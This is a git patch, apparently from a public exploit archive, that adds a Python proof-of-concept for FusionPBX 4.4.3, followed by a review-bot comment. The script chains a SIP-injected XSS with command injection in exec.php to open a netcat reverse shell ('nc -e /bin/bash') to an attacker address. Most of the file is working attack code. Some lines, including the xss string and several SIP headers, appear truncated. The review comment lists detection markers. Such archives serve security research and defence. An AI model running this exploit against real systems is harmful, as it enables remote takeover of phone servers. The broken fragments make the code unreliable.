From 698fffff86b5a3f94e7ff8d59b14c88bdfecefaf Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 13 Jun 2019 05:01:52 +0000
Subject: [PATCH] DB: 2019-06-13 1 changes to exploits/shellcodes FusionPBX 4.4.3 - Remote Command Execution
---
 exploits/php/webapps/46985.py | 85 +++++++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 86 insertions(+)
 create mode 100755 exploits/php/webapps/46985.py
diff --git a/exploits/php/webapps/46985.py b/exploits/php/webapps/46985.py
new file mode 100755
index 000000000..b883eeafd
--- /dev/null
+++ b/exploits/php/webapps/46985.py
@@ -0,0 +1,85 @@
+# Exploit Title: FusionPBX <= 4.4.3 Command Injection RCE via XSS
+# Date: 06-11-2019
+# Exploit Author: Dustin Cobb
+# Vendor Homepage: https://www.fusionpbx.com
+# Software Link: https://https://github.com/fusionpbx/fusionpbx
+# Version: <= 4.4.3
+# Tested on: Debian 8.11
+# CVE : CVE-2019-11408 (XSS) AND CVE-2019-11409 (Command Injection RCE)
+
+#!/usr/bin/python
+import socket, sys
+from random import randint
+from hashlib import md5
+
+# Exploitation steps:
+#
+# 1. First, encode an XSS payload that will be injected into the
+“Caller ID Number” field, or “User” component of the SIP
+“From” URI.
+# 2. Connect to external SIP profile port and send a SIP INVITE
+packet with XSS payload injected into the From Field.
+# 3. XSS payload will fire operator panel screen (CVE-2019-11408), which
+is designed to be monitored constantly by a call center operator.
+# 4. Once XSS code executes, a call is made to the exec.php script
+(CVE-2019-11409) with a reverse shell payload that connects back to
+a netcat listener on the attacker system.
+
+
+# edit these variables to set up attack
+victim_addr="10.10.10.10"
+victim_host="victim-pbx1.example.com"
+victim_num="12125551212"
+
+attacker_ip="10.10.10.20"
+attacker_port=4444
+
+def encode(val):
+ ret=""
+
+ for c in val:
+ ret+="\\x%02x" % ord(c)
+
+ return ret
+
+callid=md5(str(randint(0,99999999))).hexdigest()
+
+cmd="nc -e /bin/bash %s %d" % (attacker_ip, attacker_port)
+payload="q=new XMLHttpRequest();q.open('GET','exec.php?cmd=system %s',true);q.send();" % cmd
+
+xss=";tag=%s
+To:
+Call-ID: %s
+CSeq: 1 INVITE
+Contact:
+Max-Forwards: 70
+User-Agent: Exploit POC
+Content-Type: application/sdp
+Allow: INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE, MESSAGE
+Content-Length: 209
+
+v=0
+o=root 1204310316 1204310316 IN IP4 127.0.0.1
+s=Media Gateway
+c=IN IP4 127.0.0.1
+t=0 0
+m=audio 4446 RTP/AVP 0 101
+a=rtpmap:0 PCMU/8000
+a=rtpmap:101 telephone-event/8000
+a=fmtp:101 0-16
+a=ptime:2
+a=sendrecv""" % (victim_num, victim_host, xss, callid, victim_num, victim_host, callid)
+
+payload=payload.replace("\n","\r\n")
+
+s=socket.socket()
+
+s.connect((victim_addr,5080))
+
+print payload
+print
+
+s.send(payload)
+data=s.recv(8192)
+
+print data
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e83f4a5f5..de18af0ac 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -41391,3 +41391,4 @@ id,file,description,date,author,type,platform,port
 46981,exploits/php/webapps/46981.txt,"WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution",2019-06-11,xulchibalraa,webapps,php,80
 46982,exploits/php/webapps/46982.txt,"phpMyAdmin 4.8 - Cross-Site Request Forgery",2019-06-11,Riemann,webapps,php,
 46983,exploits/jsp/webapps/46983.txt,"Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting",2019-06-11,"Valerio Brussani",webapps,jsp,
+46985,exploits/php/webapps/46985.py,"FusionPBX 4.4.3 - Remote Command Execution",2019-06-12,"Dustin Cobb",webapps,php,
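Review bot: The `#!/usr/bin/python` line comes after the eight-line comment header, so it is not an interpreter directive, and the interpreter the script actually needs is otherwise undocumented — `print payload`, `print data` and `md5(str(randint(...)))` are Python 2 only. Either move the shebang to line 1 or add `# Requires: Python 2` to the header block so a reader does not have to infer it. Several lines of this hunk also appear truncated in this rendering rather than in the commit: `xss=";tag=%s` and the bare `To:`/`Contact:` headers have presumably lost angle-bracketed text, and the body of `encode` shows a one-space indent, so the file cannot be judged complete from what is shown here and should be checked against the stored file. As a defender's aside, the fixed `User-Agent: Exploit POC` header and the `exec.php?cmd=` request described in the steps comment are the observable markers of this PoC; stating that in the header would help operators who read it for detection rather than reproduction.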